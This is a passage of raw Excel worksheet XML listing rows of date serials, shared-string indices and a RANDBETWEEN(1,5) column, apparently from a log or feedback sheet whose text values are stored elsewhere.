        <f t="shared" ca="1" si="218"/>
        <v>3</v>
      </c>
    </row>
    <row r="14013" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14013" s="1">
        <v>43255.219606481478</v>
      </c>
      <c r="C14013" t="s">
        <v>71</v>
      </c>
      <c r="E14013" t="s">
        <v>12573</v>
      </c>
      <c r="F14013">
        <f t="shared" ca="1" si="218"/>
        <v>3</v>
      </c>
    </row>
    <row r="14014" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14014" s="1">
        <v>43255.198229166665</v>
      </c>
      <c r="C14014" t="s">
        <v>48</v>
      </c>
      <c r="E14014" s="2" t="s">
        <v>12574</v>
      </c>
      <c r="F14014">
        <f t="shared" ca="1" si="218"/>
        <v>2</v>
      </c>
    </row>
    <row r="14015" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14015" s="1">
        <v>43255.185347222221</v>
      </c>
      <c r="C14015" t="s">
        <v>43</v>
      </c>
      <c r="E14015" s="2" t="s">
        <v>12575</v>
      </c>
      <c r="F14015">
        <f t="shared" ca="1" si="218"/>
        <v>5</v>
      </c>
    </row>
    <row r="14016" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A14016" s="1">
        <v>43255.17459490741</v>
      </c>
      <c r="C14016" t="s">
        <v>60</v>
      </c>
      <c r="E14016" s="2" t="s">
        <v>12576</v>
      </c>
      <c r="F14016">
        <f t="shared" ca="1" si="218"/>
        <v>2</v>
      </c>
    </row>
    <row r="14017" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14017" s="1">
        <v>43255.163078703707</v>
      </c>
      <c r="C14017" t="s">
        <v>229</v>
      </c>
      <c r="E14017" t="s">
        <v>12577</v>
      </c>
      <c r="F14017">
        <f t="shared" ca="1" si="218"/>
        <v>5</v>
      </c>
    </row>
    <row r="14018" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14018" s="1">
        <v>43255.161203703705</v>
      </c>
      <c r="C14018" t="s">
        <v>73</v>
      </c>
      <c r="E14018" s="2" t="s">
        <v>12578</v>
      </c>
      <c r="F14018">
        <f t="shared" ref="F14018:F14081" ca="1" si="219">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="14019" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14019" s="1">
        <v>43255.146631944444</v>
      </c>
      <c r="C14019" t="s">
        <v>71</v>
      </c>
      <c r="E14019" s="2" t="s">
        <v>12579</v>
      </c>
      <c r="F14019">
        <f t="shared" ca="1" si="219"/>
        <v>3</v>
      </c>
    </row>
    <row r="14020" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14020" s="1">
        <v>43255.124861111108</v>
      </c>
      <c r="C14020" t="s">
        <v>41</v>
      </c>
      <c r="D14020" t="s">
        <v>312</v>
      </c>
      <c r="E14020" t="s">
        <v>12580</v>
      </c>
      <c r="F14020">
        <f t="shared" ca="1" si="219"/>
        <v>5</v>
      </c>
    </row>
    <row r="14021" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A14021" s="1">
        <v>43255.09851851852</v>
      </c>
      <c r="C14021" t="s">
        <v>535</v>
      </c>
      <c r="E14021" s="2" t="s">
        <v>12581</v>
      </c>
      <c r="F14021">
        <f t="shared" ca="1" si="219"/>
        <v>2</v>
      </c>
    </row>
    <row r="14022" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14022" s="1">
        <v>43255.008657407408</v>
      </c>
      <c r="C14022" t="s">
        <v>1812</v>
      </c>
      <c r="D14022" t="s">
        <v>821</v>
      </c>
      <c r="E14022" t="s">
        <v>12582</v>
      </c>
      <c r="F14022">
        <f t="shared" ca="1" si="219"/>
        <v>3</v>
      </c>
    </row>
    <row r="14023" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A14023" s="1">
        <v>43254.974120370367</v>
      </c>
      <c r="C14023" t="s">
        <v>1501</v>
      </c>
      <c r="D14023" t="s">
        <v>632</v>
      </c>
      <c r="E14023" s="2" t="s">
        <v>12583</v>
      </c>
      <c r="F14023">
        <f t="shared" ca="1" si="219"/>
        <v>3</v>
      </c>
    </row>
    <row r="14024" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14024" s="1">
        <v>43254.876446759263</v>
      </c>
      <c r="C14024" t="s">
        <v>2138</v>
      </c>
      <c r="D14024" t="s">
        <v>993</v>
      </c>
      <c r="E14024" t="s">
        <v>12584</v>
      </c>
      <c r="F14024">
        <f t="shared" ca="1" si="219"/>
        <v>5</v>
      </c>
    </row>
    <row r="14025" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14025" s="1">
        <v>43254.876435185186</v>
      </c>
      <c r="C14025" t="s">
        <v>2138</v>
      </c>
      <c r="D14025" t="s">
        <v>993</v>
      </c>
      <c r="E14025" t="s">
        <v>12584</v>
      </c>
      <c r="F14025">
        <f t="shared" ca="1" si="219"/>
        <v>1</v>
      </c>
    </row>
    <row r="14026" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14026" s="1">
        <v>43254.675370370373</v>
      </c>
      <c r="C14026" t="s">
        <v>6</v>
      </c>
      <c r="D14026" t="s">
        <v>114</v>
      </c>
      <c r="E14026" t="s">
        <v>12585</v>
      </c>
      <c r="F14026">
        <f t="shared" ca="1" si="219"/>
        <v>4</v>
      </c>
    </row>
    <row r="14027" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14027" s="1">
        <v>43254.599270833336</v>
      </c>
      <c r="C14027" t="s">
        <v>10</v>
      </c>
      <c r="D14027" t="s">
        <v>92</v>
      </c>
      <c r="E14027" t="s">
        <v>12586</v>
      </c>
      <c r="F14027">
        <f t="shared" ca="1" si="219"/>
        <v>3</v>
      </c>
    </row>
    <row r="14028" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14028" s="1">
        <v>43254.529687499999</v>
      </c>
      <c r="C14028" t="s">
        <v>166</v>
      </c>
      <c r="E14028" t="s">
        <v>12587</v>
      </c>
      <c r="F14028">
        <f t="shared" ca="1" si="219"/>
        <v>1</v>
      </c>
    </row>
    <row r="14029" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14029" s="1">
        <v>43254.529108796298</v>
      </c>
      <c r="C14029" t="s">
        <v>318</v>
      </c>
      <c r="E14029" s="2" t="s">
        <v>12588</v>
      </c>
      <c r="F14029">
        <f t="shared" ca="1" si="219"/>
        <v>1</v>
      </c>
    </row>
    <row r="14030" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14030" s="1">
        <v>43254.501550925925</v>
      </c>
      <c r="C14030" t="s">
        <v>5361</v>
      </c>
      <c r="D14030" t="s">
        <v>330</v>
      </c>
      <c r="E14030" t="s">
        <v>12584</v>
      </c>
      <c r="F14030">
        <f t="shared" ca="1" si="219"/>
        <v>1</v>
      </c>
    </row>
    <row r="14031" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14031" s="1">
        <v>43254.501527777778</v>
      </c>
      <c r="C14031" t="s">
        <v>5361</v>
      </c>
      <c r="D14031" t="s">
        <v>330</v>
      </c>
      <c r="E14031" t="s">
        <v>12584</v>
      </c>
      <c r="F14031">
        <f t="shared" ca="1" si="219"/>
        <v>5</v>
      </c>
    </row>
    <row r="14032" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14032" s="1">
        <v>43254.467442129629</v>
      </c>
      <c r="C14032" t="s">
        <v>71</v>
      </c>
      <c r="E14032" s="2" t="s">
        <v>12589</v>
      </c>
      <c r="F14032">
        <f t="shared" ca="1" si="219"/>
        <v>5</v>
      </c>
    </row>
    <row r="14033" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14033" s="1">
        <v>43254.445532407408</v>
      </c>
      <c r="C14033" t="s">
        <v>10</v>
      </c>
      <c r="D14033" t="s">
        <v>52</v>
      </c>
      <c r="E14033" t="s">
        <v>12590</v>
      </c>
      <c r="F14033">
        <f t="shared" ca="1" si="219"/>
        <v>5</v>
      </c>
    </row>
    <row r="14034" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A14034" s="1">
        <v>43254.36515046296</v>
      </c>
      <c r="C14034" t="s">
        <v>17</v>
      </c>
      <c r="E14034" s="2" t="s">
        <v>12591</v>
      </c>
      <c r="F14034">
        <f t="shared" ca="1" si="219"/>
        <v>3</v>
      </c>
    </row>
    <row r="14035" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14035" s="1">
        <v>43254.318819444445</v>
      </c>
      <c r="C14035" t="s">
        <v>17</v>
      </c>
      <c r="E14035" t="s">
        <v>12592</v>
      </c>
      <c r="F14035">
        <f t="shared" ca="1" si="219"/>
        <v>5</v>
      </c>
    </row>
    <row r="14036" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A14036" s="1">
        <v>43254.262465277781</v>
      </c>
      <c r="C14036" t="s">
        <v>197</v>
      </c>
      <c r="E14036" s="2" t="s">
        <v>12593</v>
      </c>
      <c r="F14036">
        <f t="shared" ca="1" si="219"/>
        <v>5</v>
      </c>
    </row>
    <row r="14037" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14037" s="1">
        <v>43254.165439814817</v>
      </c>
      <c r="C14037" t="s">
        <v>542</v>
      </c>
      <c r="D14037" t="s">
        <v>86</v>
      </c>
      <c r="E14037" t="s">
        <v>12594</v>
      </c>
      <c r="F14037">
        <f t="shared" ca="1" si="219"/>
        <v>4</v>
      </c>
    </row>
    <row r="14038" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14038" s="1">
        <v>43253.935891203706</v>
      </c>
      <c r="C14038" t="s">
        <v>41</v>
      </c>
      <c r="E14038" t="s">
        <v>12595</v>
      </c>
      <c r="F14038">
        <f t="shared" ca="1" si="219"/>
        <v>3</v>
      </c>
    </row>
    <row r="14039" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14039" s="1">
        <v>43253.913518518515</v>
      </c>
      <c r="C14039" t="s">
        <v>41</v>
      </c>
      <c r="E14039" s="2" t="s">
        <v>12596</v>
      </c>
      <c r="F14039">
        <f t="shared" ca="1" si="219"/>
        <v>3</v>
      </c>
    </row>
    <row r="14040" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14040" s="1">
        <v>43253.710416666669</v>
      </c>
      <c r="C14040" t="s">
        <v>253</v>
      </c>
      <c r="D14040" t="s">
        <v>290</v>
      </c>
      <c r="E14040" t="s">
        <v>12597</v>
      </c>
      <c r="F14040">
        <f t="shared" ca="1" si="219"/>
        <v>5</v>
      </c>
    </row>
    <row r="14041" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14041" s="1">
        <v>43253.498993055553</v>
      </c>
      <c r="C14041" t="s">
        <v>6</v>
      </c>
      <c r="D14041" t="s">
        <v>25</v>
      </c>
      <c r="E14041" s="2" t="s">
        <v>12598</v>
      </c>
      <c r="F14041">
        <f t="shared" ca="1" si="219"/>
        <v>1</v>
      </c>
    </row>
    <row r="14042" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14042" s="1">
        <v>43253.335196759261</v>
      </c>
      <c r="C14042" t="s">
        <v>173</v>
      </c>
      <c r="D14042" t="s">
        <v>112</v>
      </c>
      <c r="E14042" s="2" t="s">
        <v>12599</v>
      </c>
      <c r="F14042">
        <f t="shared" ca="1" si="219"/>
        <v>1</v>
      </c>
    </row>
    <row r="14043" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14043" s="1">
        <v>43253.322881944441</v>
      </c>
      <c r="C14043" t="s">
        <v>314</v>
      </c>
      <c r="D14043" t="s">
        <v>36</v>
      </c>
      <c r="E14043" t="s">
        <v>12584</v>
      </c>
      <c r="F14043">
        <f t="shared" ca="1" si="219"/>
        <v>3</v>
      </c>
    </row>
    <row r="14044" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14044" s="1">
        <v>43253.322881944441</v>
      </c>
      <c r="C14044" t="s">
        <v>178</v>
      </c>
      <c r="D14044" t="s">
        <v>750</v>
      </c>
      <c r="E14044" t="s">
        <v>12584</v>
      </c>
      <c r="F14044">
        <f t="shared" ca="1" si="219"/>
        <v>4</v>
      </c>
    </row>
    <row r="14045" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14045" s="1">
        <v>43253.322858796295</v>
      </c>
      <c r="C14045" t="s">
        <v>314</v>
      </c>
      <c r="D14045" t="s">
        <v>36</v>
      </c>
      <c r="E14045" t="s">
        <v>12584</v>
      </c>
      <c r="F14045">
        <f t="shared" ca="1" si="219"/>
        <v>3</v>
      </c>
    </row>
    <row r="14046" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14046" s="1">
        <v>43253.322858796295</v>
      </c>
      <c r="C14046" t="s">
        <v>178</v>
      </c>
      <c r="D14046" t="s">
        <v>750</v>
      </c>
      <c r="E14046" t="s">
        <v>12584</v>
      </c>
      <c r="F14046">
        <f t="shared" ca="1" si="219"/>
        <v>4</v>
      </c>
    </row>
    <row r="14047" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A14047" s="1">
        <v>43253.144328703704</v>
      </c>
      <c r="C14047" t="s">
        <v>41</v>
      </c>
      <c r="E14047" s="2" t="s">
        <v>12600</v>
      </c>
      <c r="F14047">
        <f t="shared" ca="1" si="219"/>
        <v>4</v>
      </c>
    </row>
    <row r="14048" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14048" s="1">
        <v>43252.985729166663</v>
      </c>
      <c r="C14048" t="s">
        <v>10</v>
      </c>
      <c r="D14048" t="s">
        <v>480</v>
      </c>
      <c r="E14048" t="s">
        <v>12601</v>
      </c>
      <c r="F14048">
        <f t="shared" ca="1" si="219"/>
        <v>1</v>
      </c>
    </row>
    <row r="14049" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A14049" s="1">
        <v>43252.855636574073</v>
      </c>
      <c r="C14049" t="s">
        <v>845</v>
      </c>
      <c r="E14049" s="2" t="s">
        <v>12602</v>
      </c>
      <c r="F14049">
        <f t="shared" ca="1" si="219"/>
        <v>1</v>
      </c>
    </row>
    <row r="14050" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14050" s="1">
        <v>43252.788425925923</v>
      </c>
      <c r="C14050" t="s">
        <v>10</v>
      </c>
      <c r="D14050" t="s">
        <v>367</v>
      </c>
      <c r="E14050" s="2" t="s">
        <v>12603</v>
      </c>
      <c r="F14050">
        <f t="shared" ca="1" si="219"/>
        <v>3</v>
      </c>
    </row>
    <row r="14051" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14051" s="1">
        <v>43252.708182870374</v>
      </c>
      <c r="C14051" t="s">
        <v>10</v>
      </c>
      <c r="D14051" t="s">
        <v>158</v>
      </c>
      <c r="E14051" t="s">
        <v>12604</v>
      </c>
      <c r="F14051">
        <f t="shared" ca="1" si="219"/>
        <v>5</v>
      </c>
    </row>
    <row r="14052" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14052" s="1">
        <v>43252.702152777776</v>
      </c>
      <c r="C14052" t="s">
        <v>10</v>
      </c>
      <c r="D14052" t="s">
        <v>222</v>
      </c>
      <c r="E14052" t="s">
        <v>12605</v>
      </c>
      <c r="F14052">
        <f t="shared" ca="1" si="219"/>
        <v>4</v>
      </c>
    </row>
    <row r="14053" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14053" s="1">
        <v>43252.662372685183</v>
      </c>
      <c r="C14053" t="s">
        <v>140</v>
      </c>
      <c r="D14053" t="s">
        <v>141</v>
      </c>
      <c r="E14053" t="s">
        <v>12606</v>
      </c>
      <c r="F14053">
        <f t="shared" ca="1" si="219"/>
        <v>2</v>
      </c>
    </row>
    <row r="14054" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A14054" s="1">
        <v>43252.636574074073</v>
      </c>
      <c r="C14054" t="s">
        <v>48</v>
      </c>
      <c r="E14054" s="2" t="s">
        <v>12607</v>
      </c>
      <c r="F14054">
        <f t="shared" ca="1" si="219"/>
        <v>4</v>
      </c>
    </row>
    <row r="14055" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14055" s="1">
        <v>43252.626840277779</v>
      </c>
      <c r="C14055" t="s">
        <v>10</v>
      </c>
      <c r="D14055" t="s">
        <v>192</v>
      </c>
      <c r="E14055" t="s">
        <v>12608</v>
      </c>
      <c r="F14055">
        <f t="shared" ca="1" si="219"/>
        <v>2</v>
      </c>
    </row>
    <row r="14056" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14056" s="1">
        <v>43252.547349537039</v>
      </c>
      <c r="C14056" t="s">
        <v>10</v>
      </c>
      <c r="D14056" t="s">
        <v>23</v>
      </c>
      <c r="E14056" s="2" t="s">
        <v>12609</v>
      </c>
      <c r="F14056">
        <f t="shared" ca="1" si="219"/>
        <v>4</v>
      </c>
    </row>
    <row r="14057" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14057" s="1">
        <v>43252.533368055556</v>
      </c>
      <c r="C14057" t="s">
        <v>6</v>
      </c>
      <c r="D14057" t="s">
        <v>821</v>
      </c>
      <c r="E14057" s="2" t="s">
        <v>12610</v>
      </c>
      <c r="F14057">
        <f t="shared" ca="1" si="219"/>
        <v>4</v>
      </c>
    </row>
    <row r="14058" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14058" s="1">
        <v>43252.498402777775</v>
      </c>
      <c r="C14058" t="s">
        <v>6</v>
      </c>
      <c r="E14058" t="s">
        <v>12611</v>
      </c>
      <c r="F14058">
        <f t="shared" ca="1" si="219"/>
        <v>4</v>
      </c>
    </row>
    <row r="14059" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A14059" s="1">
        <v>43252.4921875</v>
      </c>
      <c r="C14059" t="s">
        <v>10</v>
      </c>
      <c r="D14059" t="s">
        <v>107</v>
      </c>
      <c r="E14059" s="2" t="s">
        <v>12612</v>
      </c>
      <c r="F14059">
        <f t="shared" ca="1" si="219"/>
        <v>3</v>
      </c>
    </row>
    <row r="14060" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14060" s="1">
        <v>43252.447291666664</v>
      </c>
      <c r="C14060" t="s">
        <v>10</v>
      </c>
      <c r="D14060" t="s">
        <v>112</v>
      </c>
      <c r="E14060" t="s">
        <v>12613</v>
      </c>
      <c r="F14060">
        <f t="shared" ca="1" si="219"/>
        <v>3</v>
      </c>
    </row>
    <row r="14061" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14061" s="1">
        <v>43252.438055555554</v>
      </c>
      <c r="C14061" t="s">
        <v>10</v>
      </c>
      <c r="D14061" t="s">
        <v>271</v>
      </c>
      <c r="E14061" t="s">
        <v>12614</v>
      </c>
      <c r="F14061">
        <f t="shared" ca="1" si="219"/>
        <v>5</v>
      </c>
    </row>
    <row r="14062" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14062" s="1">
        <v>43252.427488425928</v>
      </c>
      <c r="C14062" t="s">
        <v>65</v>
      </c>
      <c r="E14062" s="2" t="s">
        <v>12615</v>
      </c>
      <c r="F14062">
        <f t="shared" ca="1" si="219"/>
        <v>2</v>
      </c>
    </row>
    <row r="14063" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14063" s="1">
        <v>43252.418726851851</v>
      </c>
      <c r="C14063" t="s">
        <v>10</v>
      </c>
      <c r="D14063" t="s">
        <v>112</v>
      </c>
      <c r="E14063" t="s">
        <v>12616</v>
      </c>
      <c r="F14063">
        <f t="shared" ca="1" si="219"/>
        <v>1</v>
      </c>
    </row>
    <row r="14064" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14064" s="1">
        <v>43252.416388888887</v>
      </c>
      <c r="C14064" t="s">
        <v>65</v>
      </c>
      <c r="E14064" s="2" t="s">
        <v>12617</v>
      </c>
      <c r="F14064">
        <f t="shared" ca="1" si="219"/>
        <v>3</v>
      </c>
    </row>
    <row r="14065" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14065" s="1">
        <v>43252.385694444441</v>
      </c>
      <c r="C14065" t="s">
        <v>60</v>
      </c>
      <c r="E14065" t="s">
        <v>12618</v>
      </c>
      <c r="F14065">
        <f t="shared" ca="1" si="219"/>
        <v>5</v>
      </c>
    </row>
    <row r="14066" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14066" s="1">
        <v>43252.35728009259</v>
      </c>
      <c r="C14066" t="s">
        <v>48</v>
      </c>
      <c r="E14066" t="s">
        <v>12619</v>
      </c>
      <c r="F14066">
        <f t="shared" ca="1" si="219"/>
        <v>1</v>
      </c>
    </row>
    <row r="14067" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14067" s="1">
        <v>43252.335821759261</v>
      </c>
      <c r="C14067" t="s">
        <v>1209</v>
      </c>
      <c r="D14067" t="s">
        <v>381</v>
      </c>
      <c r="E14067" t="s">
        <v>12584</v>
      </c>
      <c r="F14067">
        <f t="shared" ca="1" si="219"/>
        <v>5</v>
      </c>
    </row>
    <row r="14068" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14068" s="1">
        <v>43252.335810185185</v>
      </c>
      <c r="C14068" t="s">
        <v>1209</v>
      </c>
      <c r="D14068" t="s">
        <v>381</v>
      </c>
      <c r="E14068" t="s">
        <v>12584</v>
      </c>
      <c r="F14068">
        <f t="shared" ca="1" si="219"/>
        <v>5</v>
      </c>
    </row>
    <row r="14069" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14069" s="1">
        <v>43252.326099537036</v>
      </c>
      <c r="C14069" t="s">
        <v>559</v>
      </c>
      <c r="E14069" t="s">
        <v>12620</v>
      </c>
      <c r="F14069">
        <f t="shared" ca="1" si="219"/>
        <v>2</v>
      </c>
    </row>
    <row r="14070" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A14070" s="1">
        <v>43252.321932870371</v>
      </c>
      <c r="C14070" t="s">
        <v>124</v>
      </c>
      <c r="E14070" s="2" t="s">
        <v>12621</v>
      </c>
      <c r="F14070">
        <f t="shared" ca="1" si="219"/>
        <v>2</v>
      </c>
    </row>
    <row r="14071" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A14071" s="1">
        <v>43252.320300925923</v>
      </c>
      <c r="C14071" t="s">
        <v>10</v>
      </c>
      <c r="D14071" t="s">
        <v>178</v>
      </c>
      <c r="E14071" s="2" t="s">
        <v>12622</v>
      </c>
      <c r="F14071">
        <f t="shared" ca="1" si="219"/>
        <v>3</v>
      </c>
    </row>
    <row r="14072" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14072" s="1">
        <v>43252.319571759261</v>
      </c>
      <c r="C14072" t="s">
        <v>10</v>
      </c>
      <c r="D14072" t="s">
        <v>36</v>
      </c>
      <c r="E14072" t="s">
        <v>12623</v>
      </c>
      <c r="F14072">
        <f t="shared" ca="1" si="219"/>
        <v>4</v>
      </c>
    </row>
    <row r="14073" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A14073" s="1">
        <v>43252.305925925924</v>
      </c>
      <c r="C14073" t="s">
        <v>71</v>
      </c>
      <c r="E14073" s="2" t="s">
        <v>12624</v>
      </c>
      <c r="F14073">
        <f t="shared" ca="1" si="219"/>
        <v>5</v>
      </c>
    </row>
    <row r="14074" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14074" s="1">
        <v>43252.258657407408</v>
      </c>
      <c r="C14074" t="s">
        <v>41</v>
      </c>
      <c r="E14074" s="2" t="s">
        <v>12625</v>
      </c>
      <c r="F14074">
        <f t="shared" ca="1" si="219"/>
        <v>5</v>
      </c>
    </row>
    <row r="14075" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A14075" s="1">
        <v>43252.222858796296</v>
      </c>
      <c r="C14075" t="s">
        <v>10</v>
      </c>
      <c r="D14075" t="s">
        <v>36</v>
      </c>
      <c r="E14075" s="2" t="s">
        <v>12626</v>
      </c>
      <c r="F14075">
        <f t="shared" ca="1" si="219"/>
        <v>2</v>
      </c>
    </row>
    <row r="14076" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14076" s="1">
        <v>43252.210844907408</v>
      </c>
      <c r="C14076" t="s">
        <v>71</v>
      </c>
      <c r="E14076" t="s">
        <v>12627</v>
      </c>
      <c r="F14076">
        <f t="shared" ca="1" si="219"/>
        <v>3</v>
      </c>
    </row>
    <row r="14077" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14077" s="1">
        <v>43252.192523148151</v>
      </c>
      <c r="C14077" t="s">
        <v>4500</v>
      </c>
      <c r="E14077" s="2" t="s">
        <v>12628</v>
      </c>
      <c r="F14077">
        <f t="shared" ca="1" si="219"/>
        <v>1</v>
      </c>
    </row>
    <row r="14078" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14078" s="1">
        <v>43252.169768518521</v>
      </c>
      <c r="C14078" t="s">
        <v>124</v>
      </c>
      <c r="E14078" s="2" t="s">
        <v>12629</v>
      </c>
      <c r="F14078">
        <f t="shared" ca="1" si="219"/>
        <v>3</v>
      </c>
    </row>
    <row r="14079" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A14079" s="1">
        <v>43252.135787037034</v>
      </c>
      <c r="C14079" t="s">
        <v>6239</v>
      </c>
      <c r="D14079" t="s">
        <v>163</v>
      </c>
      <c r="E14079" s="2" t="s">
        <v>12630</v>
      </c>
      <c r="F14079">
        <f t="shared" ca="1" si="219"/>
        <v>4</v>
      </c>
    </row>
    <row r="14080" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14080" s="1">
        <v>43252.00037037037</v>
      </c>
      <c r="C14080" t="s">
        <v>845</v>
      </c>
      <c r="D14080" t="s">
        <v>6</v>
      </c>
      <c r="E14080" t="s">
        <v>12631</v>
      </c>
      <c r="F14080">
        <f t="shared" ca="1" si="219"/>
        <v>4</v>
      </c>
    </row>
    <row r="14081" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14081" s="1">
        <v>43251.957060185188</v>
      </c>
      <c r="C14081" t="s">
        <v>147</v>
      </c>
      <c r="D14081" t="s">
        <v>2214</v>
      </c>
      <c r="E14081" t="s">
        <v>12584</v>
      </c>
      <c r="F14081">
        <f t="shared" ca="1" si="219"/>
        <v>2</v>
      </c>
    </row>
    <row r="14082" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14082" s="1">
        <v>43251.957037037035</v>
      </c>
      <c r="C14082" t="s">
        <v>147</v>
      </c>
      <c r="D14082" t="s">
        <v>2214</v>
      </c>
      <c r="E14082" t="s">
        <v>12584</v>
      </c>
      <c r="F14082">
        <f t="shared" ref="F14082:F14145" ca="1" si="220">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="14083" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A14083" s="1">
        <v>43251.936655092592</v>
      </c>
      <c r="C14083" t="s">
        <v>41</v>
      </c>
      <c r="E14083" s="2" t="s">
        <v>12632</v>
      </c>
      <c r="F14083">
        <f t="shared" ca="1" si="220"/>
        <v>4</v>
      </c>
    </row>
    <row r="14084" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A14084" s="1">
        <v>43251.899583333332</v>
      </c>
      <c r="C14084" t="s">
        <v>314</v>
      </c>
      <c r="E14084" s="2" t="s">
        <v>12633</v>
      </c>
      <c r="F14084">
        <f t="shared" ca="1" si="220"/>
        <v>2</v>
      </c>
    </row>
    <row r="14085" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14085" s="1">
        <v>43251.894791666666</v>
      </c>
      <c r="C14085" t="s">
        <v>10</v>
      </c>
      <c r="D14085" t="s">
        <v>374</v>
      </c>
      <c r="E14085" t="s">
        <v>12634</v>
      </c>
      <c r="F14085">
        <f t="shared" ca="1" si="220"/>
        <v>4</v>
      </c>
    </row>
    <row r="14086" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A14086" s="1">
        <v>43251.858819444446</v>
      </c>
      <c r="C14086" t="s">
        <v>10</v>
      </c>
      <c r="D14086" t="s">
        <v>163</v>
      </c>
      <c r="E14086" s="2" t="s">
        <v>12635</v>
      </c>
      <c r="F14086">
        <f t="shared" ca="1" si="220"/>
        <v>4</v>
      </c>
    </row>
    <row r="14087" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A14087" s="1">
        <v>43251.852083333331</v>
      </c>
      <c r="C14087" t="s">
        <v>10</v>
      </c>
      <c r="D14087" t="s">
        <v>163</v>
      </c>
      <c r="E14087" s="2" t="s">
        <v>12636</v>
      </c>
      <c r="F14087">
        <f t="shared" ca="1" si="220"/>
        <v>2</v>
      </c>
    </row>
    <row r="14088" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A14088" s="1">
        <v>43251.77070601852</v>
      </c>
      <c r="C14088" t="s">
        <v>29</v>
      </c>
      <c r="D14088" t="s">
        <v>112</v>
      </c>
      <c r="E14088" s="2" t="s">
        <v>12637</v>
      </c>
      <c r="F14088">
        <f t="shared" ca="1" si="220"/>
        <v>3</v>
      </c>
    </row>
    <row r="14089" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A14089" s="1">
        <v>43251.768912037034</v>
      </c>
      <c r="C14089" t="s">
        <v>10</v>
      </c>
      <c r="D14089" t="s">
        <v>1036</v>
      </c>
      <c r="E14089" s="2" t="s">
        <v>12638</v>
      </c>
      <c r="F14089">
        <f t="shared" ca="1" si="220"/>
        <v>2</v>
      </c>
    </row>
    <row r="14090" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A14090" s="1">
        <v>43251.676261574074</v>
      </c>
      <c r="C14090" t="s">
        <v>3049</v>
      </c>
      <c r="E14090" s="2" t="s">
        <v>4049</v>
      </c>
      <c r="F14090">
